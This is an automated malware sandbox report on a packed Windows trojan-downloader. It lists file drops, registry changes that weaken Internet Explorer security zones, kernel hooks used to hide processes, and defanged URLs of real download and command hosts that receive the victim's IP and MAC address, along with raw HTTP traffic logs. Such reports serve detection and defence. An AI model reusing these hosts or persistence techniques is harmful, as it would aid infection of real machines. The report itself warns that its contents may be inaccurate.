Gen.Variant.Graftor.181159_8a082618de
HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Graftor.181159 (B) (Emsisoft), Gen:Variant.Graftor.181159 (AdAware), Trojan-Downloader.Win32.Karagany.1.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 8a082618de41b5f732173d81d516b4ef
SHA1: 6f1557cb1910831ccfcedc375fd4fa7966fb2a13
SHA256: 8fa28f799587fc2ff38a9c8880855e39f708e4a474246a29a676ccbef028c788
SSDeep: 12288:XU9OQl4SuMC1 It8ix/TlqlB zp19bg4YStrskcaVHHrE0JoS:XUrlRP0px/TlqlB l1xfYStrfca
Size: 484864 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2015-03-23 18:43:45
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan-Downloader. A Trojan program that downloads files from the Internet without the user's knowledge and executes them.
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
ndis500.exe:3740
appmon.exe:2132
MiniIE.exe:1256
ndsqp.exe:3824
audiodg.exe:2216
yum.exe:3540
The Trojan injects its code into the following process(es):
Cattle.exe:2188
%original file name%.exe:996
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process ndis500.exe:3740 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\gYhxYl3.sys (22 bytes)
%System%\vrPCEc2 (1830 bytes)
The Trojan deletes the following file(s):
%System%\gYhxYl3.sys (0 bytes)
%WinDir%\ax01.da0 (0 bytes)
%System%\vrPCEc2 (0 bytes)
The process appmon.exe:2132 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\adbWinpi.dll (304 bytes)
%Documents and Settings%\%current user%\Application Data\Cattle.exe (3726 bytes)
%Documents and Settings%\%current user%\Application Data\AdbWinApi.dll (96 bytes)
%Documents and Settings%\%current user%\Application Data\AdbWinUsbApi.dll (60 bytes)
%Documents and Settings%\%current user%\Application Data\TscServer.exe (1653 bytes)
The process ndsqp.exe:3824 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\jBkaBo6.sys (22 bytes)
%System%\yuSFHf5 (12 bytes)
The Trojan deletes the following file(s):
%System%\jBkaBo6.sys (0 bytes)
%System%\yuSFHf5 (0 bytes)
The process %original file name%.exe:996 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\262792\svchost.exe (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\26279\svchost.exe (1629 bytes)
The process audiodg.exe:2216 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\clk.ini (103 bytes)
%WinDir%\run.bat (196 bytes)
%System%\cBLK.dll (2145 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@insurance[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)
Registry activity
The process Cattle.exe:2188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0D 58 62 76 4B 62 56 12 27 31 AD D2 B9 F4 41 DF"
The process ndis500.exe:3740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 4B 82 8D 93 F2 BA 8D 01 58 74 8C 57 D2 E1 89"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\uOwZ216\Security]
[HKLM\System\CurrentControlSet\Services\uOwZ216]
[HKLM\System\CurrentControlSet\Services\uOwZ216\Enum]
The process appmon.exe:2132 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 CD 43 1E B1 C9 B1 0B B4 F3 A3 5C 4E C7 A1 57"
The process MiniIE.exe:1256 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 52 03 7F 5D B2 C6 4D 32 11 88 3B 68 99 67 7B"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"DefaultValue" = "yes"
[HKCR\Microsoft.PubIE]
"(Default)" = "%WinDir%\KeS\MiniIE.exe"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"DisableScriptDebuggerIE" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"CheckedValue" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"CheckedValue" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION]
"MiniIE.exe" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1601" = "0"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"UncheckedValue" = "no"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"UncheckedValue" = "no"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "10"
"MaxConnectionsPer1_0Server" = "10"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger" = "yes"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"DefaultValue" = "yes"
The process ndsqp.exe:3824 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA FA BE 37 55 0D 1D BB 16 77 C6 E2 93 24 30 39"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE security zone settings to map all local web nodes with no dots that are not assigned to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\xRzC549]
[HKLM\System\CurrentControlSet\Services\xRzC549\Enum]
[HKLM\System\CurrentControlSet\Services\xRzC549\Security]
The process %original file name%.exe:996 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D BF D3 46 03 3B 69 46 E3 3C 80 1C 9E 3E C3 F0"
The process audiodg.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B8 F4 D8 59 52 8A 7F 9C 80 83 87 7B 2B D0 D7 B1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"TabProcGrowth" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"DisableDeleteBrowsingHistory" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions\{e2e2dd38-d088-4134-82b7-f2ba38496583}]
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"
The process yum.exe:3540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\0\win32]
"(Default)" = "%WinDir%\KeS\sys32\urlnav.dll"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\ProgID]
"(Default)" = "Urlnav.Nav.1"
[HKCR\Urlnav.Nav]
"(Default)" = "Nav Class"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0]
"(Default)" = "urlnav 1.0 Type Library"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}]
"(Default)" = "Nav Class"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Error Dlg Displayed On Every Error" = "no"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"DefaultValue" = "yes"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Urlnav.Nav.1]
"(Default)" = "Nav Class"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"Version" = "1.0"
[HKCR\Urlnav.Nav.1\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"CheckedValue" = "yes"
[HKCR\Urlnav.Nav\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"UncheckedValue" = "no"
[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "no"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\VersionIndependentProgID]
"(Default)" = "Urlnav.Nav"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D2 BE 5A 31 A2 A1 21 2D C5 A3 98 9E 1C D0 CE CF"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}]
"(Default)" = "INav"
[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"(Default)" = "{40195CA5-4EA4-4B10-88B3-5659A0A5310B}"
[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"(Default)" = "%WinDir%\KeS\sys32\urlnav.dll"
[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\HELPDIR]
"(Default)" = "%WinDir%\KeS\sys32\"
Dropped PE files
| MD5 | File path |
|---|---|
| 8e1c47c30dba5d88699b2a1107be7e3d | c:\Documents and Settings\"%CurrentUserName%"\Application Data\9JonVu.dll |
| 01e65067a6070e8f18609886e52bef38 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\WaPZAC.exe |
| 000b3d8a037c797ed4482418c50f8a56 | c:\Documents and Settings\"%CurrentUserName%"\Application Data\x6w8DF.dll |
| 2b383b8e15eefb852d4c926a205785fe | c:\Documents and Settings\"%CurrentUserName%"\Application Data\xwiR0J.dll |
| 287e0b871129d02e71b0d376bd8bef6c | c:\Documents and Settings\"%CurrentUserName%"\Application Data\yOkNJW.dll |
| f8eae7b3a0efaeac7e49d3bb61d34afd | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\262792\svchost.exe |
| cd0b75bc3eb6ca85cacce02aea253055 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\26279\GWkgpu.nxx |
| 4116d723ede52ee003b2a7454334453d | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\26279\svchost.exe |
| f6bb20d5d513f6e1e95557eb61de8324 | c:\WINDOWS\KeS\MiniIE.exe |
| 5db345ec4edd409b5cc18c6c56352360 | c:\WINDOWS\KeS\sys32\urlnav.dll |
| 6f089346e6a6a5fbbc9bfde8cab6c5d4 | c:\WINDOWS\KeS\yum.exe |
| 4540f263d05608dcd3eb0affc059bac5 | c:\WINDOWS\system32\drivers\HideSys.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following kernel-mode hooks:
ZwOpenProcess
ZwQuerySystemInformation
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| UPX0 | 4096 | 335872 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| UPX1 | 339968 | 483328 | 482816 | 5.54469 | ef47ba33313ada4919d252635d589320 |
| UPX2 | 823296 | 4096 | 1024 | 1.77366 | 9b91b9a2651981ae286741309aeaab44 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://www.92zy.com/asb/apro.jpg | |
| hxxp://plus.zzinfor.cn/plus/config/zynet.4.bin?ver=3.180&lip=192.168.25.207&mac=000C298E22D8 | |
| hxxp://na.b9.aicdn.com/main/2015-04-02_20_12_07_789/c8e92c77cf34b8aedc5df0f1d858db72.dat | |
| hxxp://ln.p2ptool.com/txt/First_20150519.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 | |
| hxxp://ln.p2ptool.com/txt/urlnav_141114.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9 | |
| hxxp://ln.p2ptool.com/txt/listbc_20150602170806.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=E80C963847ACDC40BDEC9EB688A407E8 | |
| hxxp://ln.p2ptool.com/txt/popup_20150414.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=545EB4FE6391624B14A14B0DA1B44223 | |
| hxxp://ln.p2ptool.com/txt/multi_150601.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=EDEE2EE5CE37A121ABE9AA1C85922CDA | |
| hxxp://na.b9.aicdn.com/bho_loader/2014-09-04_09_22_38_003/BHOLoader.dll | |
| hxxp://ln.p2ptool.com/txt/list666_20150529115418.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=468311E3A962395C6AA1EB5AE134BFF6 | |
| hxxp://ln.p2ptool.com/txt/listtl_20150529180255.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=6423EAD7B80B4C2B14DA89161EFECBB4 | |
| hxxp://na.b9.aicdn.com/browser_assister/2015-04-21_17_19_51_110/9132e24c26751eba1b161bd07801b762.dat | |
| hxxp://ln.p2ptool.com/txt/ndis500_201506021708.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=7CB8231FE216E8F14A76B6A891124D85 | |
| hxxp://ln.p2ptool.com/txt/qpqpqp_201505291802.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=1FC77115C819B7258FC1528899CADE7A | |
| hxxp://ln.p2ptool.com/txt/app_20150520.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=4382E54A3FB01E93E9836E814DA569EA | |
| hxxp://ln.p2ptool.com/txt/miniIE_150427.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 | |
| hxxp://na.b9.aicdn.com/config/2015-04-28_17_53_38_445/85dee9b165e73277b343582bbc0abdce.dat | |
| hxxp://ln.p2ptool.com/txt/whitelist.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 | |
| hxxp://na.b9.aicdn.com/dticon/2015-01-20_16_16_53_418/39e2da53a78de3bbf7b66e0060d1d24e.dat | |
| hxxp://na.b9.aicdn.com/fetch_data/2014-08-21_17_15_35_123/fetch_data.dll | |
| hxxp://na.b9.aicdn.com/goto/2015-03-04_11_08_47_750/8a707cad6b1fef87a10bfdfc2cc42684.dat | |
| hxxp://na.b9.aicdn.com/goto_cfg/2015-06-02_16_12_03_271/dacd897d79a3362dcadd74dad2ac6aa7.dat | |
| hxxp://na.b9.aicdn.com/hezi/2014-10-10_16_08_46_989/c0382aec756b29bb681ba05757fbe2e3.dat | |
| hxxp://log.app.soomeng.com/wb/adb/?Ab0D41yOowlXG854AY2UdElLsL5dm7fYae/MQ3O0WhoSzLAdfLxhwJInbX2UCwLX9zg2ns0ytLlKvANXi6vZsuSO7lqv9ZBePoDGa7XS FZhtut5BNw4nkVgQsKYOnKIclHKczDQt4CNpC5b/6amYRI44eLhwQ9vojjOVMdi2zkXOfAiQVwnUjdvdw7rKpi/ | |
| hxxp://na.b9.aicdn.com/hideprocess/2015-03-23_11_11_56_660/5a68951313d2d591998e790faf81a039.dat | |
| hxxp://prd-update.b0.upaiyun.com/browser_assister/2015-04-21_17_19_51_110/9132e24c26751eba1b161bd07801b762.dat | |
| hxxp://prd-update.b0.upaiyun.com/fetch_data/2014-08-21_17_15_35_123/fetch_data.dll | |
| hxxp://prd-update.b0.upaiyun.com/goto/2015-03-04_11_08_47_750/8a707cad6b1fef87a10bfdfc2cc42684.dat | |
| hxxp://prd-update.b0.upaiyun.com/hideprocess/2015-03-23_11_11_56_660/5a68951313d2d591998e790faf81a039.dat | |
| hxxp://prd-update.b0.upaiyun.com/bho_loader/2014-09-04_09_22_38_003/BHOLoader.dll | |
| hxxp://prd-update.b0.upaiyun.com/hezi/2014-10-10_16_08_46_989/c0382aec756b29bb681ba05757fbe2e3.dat | |
| hxxp://prd-update.b0.upaiyun.com/config/2015-04-28_17_53_38_445/85dee9b165e73277b343582bbc0abdce.dat | |
| hxxp://prd-update.b0.upaiyun.com/main/2015-04-02_20_12_07_789/c8e92c77cf34b8aedc5df0f1d858db72.dat | |
| hxxp://app.log.soomeng.com/wb/adb/?Ab0D41yOowlXG854AY2UdElLsL5dm7fYae/MQ3O0WhoSzLAdfLxhwJInbX2UCwLX9zg2ns0ytLlKvANXi6vZsuSO7lqv9ZBePoDGa7XS FZhtut5BNw4nkVgQsKYOnKIclHKczDQt4CNpC5b/6amYRI44eLhwQ9vojjOVMdi2zkXOfAiQVwnUjdvdw7rKpi/ | |
| hxxp://prd-update.b0.upaiyun.com/goto_cfg/2015-06-02_16_12_03_271/dacd897d79a3362dcadd74dad2ac6aa7.dat | |
| hxxp://prd-update.b0.upaiyun.com/dticon/2015-01-20_16_16_53_418/39e2da53a78de3bbf7b66e0060d1d24e.dat | |
| u.raidmedia.com.cn | |
| l.raidmedia.com.cn | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
GPL WEB_CLIENT PNG large colour depth download attempt
Traffic
GET /txt/app_20150520.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=4382E54A3FB01E93E9836E814DA569EA HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:28 GMT
Content-Type: text/plain
Content-Length: 2197516
Last-Modified: Wed, 20 May 2015 05:35:34 GMT
Connection: close
ETag: "555c1d26-21880c"
Accept-Ranges: bytes
GET /txt/multi_150601.txt?ver=3.180&uid=zynet.4&lip=192.168.25.207&mac=000C298E22D8&p=0&b=0.0.0.0.0&md5=EDEE2EE5CE37A121ABE9AA1C85922CDA HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 03 Jun 2015 02:46:18 GMT
Content-Type: text/plain
Content-Length: 3747852
Last-Modified: Tue, 02 Jun 2015 03:08:56 GMT
Connection: close
ETag: "556d1e48-39300c"
Accept-Ranges: bytes
GET /asb/apro.jpg HTTP/1.1
Accept: */*
Referer: hXXp://VVV.92zy.com/asb/apro.jpg
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: application/x-www-form-urlencoded
Host: VVV.92zy.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 03 Jun 2015 02:46:13 GMT
Content-Type: image/jpeg
Content-Length: 202
Last-Modified: Sat, 28 Mar 2015 09:48:14 GMT
Connection: keep-alive
ETag: "551678de-ca"
Expires: Fri, 03 Jul 2015 02:46:13 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
about:..res:..baidu.com..123.sogou.com..hao123.com..icafe..1x3x.com..https://..VVV.sohu.com..VVV.sina.com..qq.com..taobao.com..tmall.com..c:..javascript:..VVV.1x3xxx.com..adpubs.yaolan.com..92tezheng.ma..
